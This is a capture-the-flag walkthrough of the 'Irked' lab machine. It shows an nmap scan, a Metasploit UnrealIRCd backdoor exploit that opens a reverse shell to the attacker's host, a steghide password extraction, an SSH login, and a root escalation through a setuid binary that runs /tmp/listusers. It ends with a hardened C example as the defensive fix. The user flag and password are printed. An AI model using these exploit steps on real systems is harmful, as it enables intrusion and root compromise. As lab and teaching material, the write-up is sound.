```
$ nmap -sC -sV -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4       111/tcp   rpcbind
|   100000  2,3,4       111/udp   rpcbind
|   100000  3,4         111/tcp6  rpcbind
|   100000  3,4         111/udp6  rpcbind
|   100024  1         39065/tcp6  status
|   100024  1         47673/udp   status
|   100024  1         49431/tcp   status
|_  100024  1         56811/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
49431/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1762.08 seconds
```
```
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT   6667             yes       The target port (TCP)
```
```
[*] Started reverse TCP double handler on 10.10.16.99:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo XSY6AWtTV0SElhyO;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "XSY6AWtTV0SElhyO\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.16.99:4444 -> 10.10.10.117:36674) at 2020-03-23 04:21:50 -0400
```
python tty shell
```
python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~$ ls -la
ls -la
total 20
drwxr-xr-x  3 ircd root 4096 May 15  2018 .
drwxr-xr-x  4 root root 4096 May 14  2018 ..
-rw-------  1 ircd ircd  333 May 15  2018 .bash_history
-rw-r--r--  1 ircd ircd    0 May 14  2018 .bashrc
-rw-r--r--  1 ircd ircd   66 May 14  2018 .selected_editor
drwx------ 13 ircd ircd 4096 Mar 22 18:37 Unreal3.2
```
```
ircd@irked:~$ cat .bash_history
cat .bash_history
ls
cat aliases
ls keys
ls keys
ls keys/CVS
cd keys
ls
file CVS
cd CVS
ls
ls Root
cat Root/Root
cd Root
ls
file Root
cat Root
cd /
ls
cd /home
ls
cd djmardov
ls
ls *
cd /tmp
ls
clear
clear
ls
cd /
ls
cd /var/www/html
ls
cd /tmp
sudo -i
cd /home/ircd
clear
ls
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit
```
```
$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
$ cat pass.txt
Kab6h+m+bbp2J:HG
```
SSH port 22
```
$ ssh djmardov@10.10.10.117
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@10.10.10.117's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~$ cat ~/Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
```
```
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-03-22 18:37 (:0)
djmardov  pts/1        2020-03-23 09:52 (10.10.16.99)
sh: 1: /tmp/listusers: not found
```
viewuser apparently tries to execute a script named listusers in /tmp that does not exist, so we create that script and write bash commands into it.
```
djmardov@irked:/tmp$ touch listusers
djmardov@irked:/tmp$ echo '#!/bin/bash' >> listusers
djmardov@irked:/tmp$ echo '/bin/sh' >> listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-03-22 18:37 (:0)
djmardov  pts/1        2020-03-23 09:52 (10.10.16.99)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:/tmp$ chmod 777 listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-03-22 18:37 (:0)
djmardov  pts/1        2020-03-23 09:52 (10.10.16.99)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
```
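The root cause of this escalation is a setuid root binary that hands a hard-coded path in a world-writable directory to `sh`, so whoever can write to /tmp decides what runs as root. The C program below is an added example written for this page, not the source of the box's viewuser binary, and it shows the pattern a defender would want instead: the helper path is confined to a root-owned directory (assumed here to be /usr/local/libexec), the file is opened and `fstat`ed before execution so that ownership and mode are checked on the same object that will run, and the helper is started through `fexecve` with a minimal environment instead of through a shell.

```c
/* Hardened helper invocation for a setuid binary. Added example; the
 * trusted directory and helper name are assumptions, not values from the box. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Assumption: this directory is owned by root and mode 0755. */
#define TRUSTED_DIR "/usr/local/libexec/"

/* A helper path is accepted only if it is absolute, sits directly under the
 * trusted directory, and contains no ".." component. "/tmp/listusers" fails. */
int path_is_trusted(const char *path)
{
    size_t n = strlen(TRUSTED_DIR);
    if (strncmp(path, TRUSTED_DIR, n) != 0) return 0;  /* wrong prefix */
    if (path[n] == '\0') return 0;                      /* directory only */
    if (strstr(path, "..") != NULL) return 0;           /* traversal */
    if (strchr(path + n, '/') != NULL) return 0;        /* subdirectory */
    return 1;
}

/* Ownership/mode policy for the helper: a regular file owned by root that is
 * not writable by group or others. Kept as a pure function so the policy can
 * be checked without touching the filesystem. */
int helper_stat_is_safe(uid_t uid, mode_t mode)
{
    if (uid != 0) return 0;
    if (!S_ISREG(mode)) return 0;
    if (mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* Open the helper, check the open descriptor (no check-then-use race on the
 * path), then execute that descriptor with a minimal environment.
 * Returns -1 if the helper is refused or cannot be started; on success
 * fexecve replaces the process and never returns. */
int run_helper(const char *path)
{
    if (!path_is_trusted(path)) {
        fprintf(stderr, "refusing helper outside %s: %s\n", TRUSTED_DIR, path);
        return -1;
    }
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) {
        perror("open helper");
        return -1;
    }
    struct stat st;
    if (fstat(fd, &st) != 0) {
        perror("fstat helper");
        close(fd);
        return -1;
    }
    if (!helper_stat_is_safe(st.st_uid, st.st_mode)) {
        fprintf(stderr, "helper %s fails ownership/mode policy\n", path);
        close(fd);
        return -1;
    }
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };  /* no inherited env */
    fexecve(fd, argv, envp);
    perror("fexecve helper");
    close(fd);
    return -1;
}

int main(void)
{
    /* The vulnerable original behaviour was equivalent to
     * system("/tmp/listusers"); this call is refused by the path policy. */
    if (run_helper("/tmp/listusers") != 0)
        return 1;
    return 0;
}
```

If the helper only needs to list logged-in users, the binary should also drop its elevated privileges (`setuid(getuid())`) before calling `run_helper`, so that even a policy mistake cannot hand out a root shell.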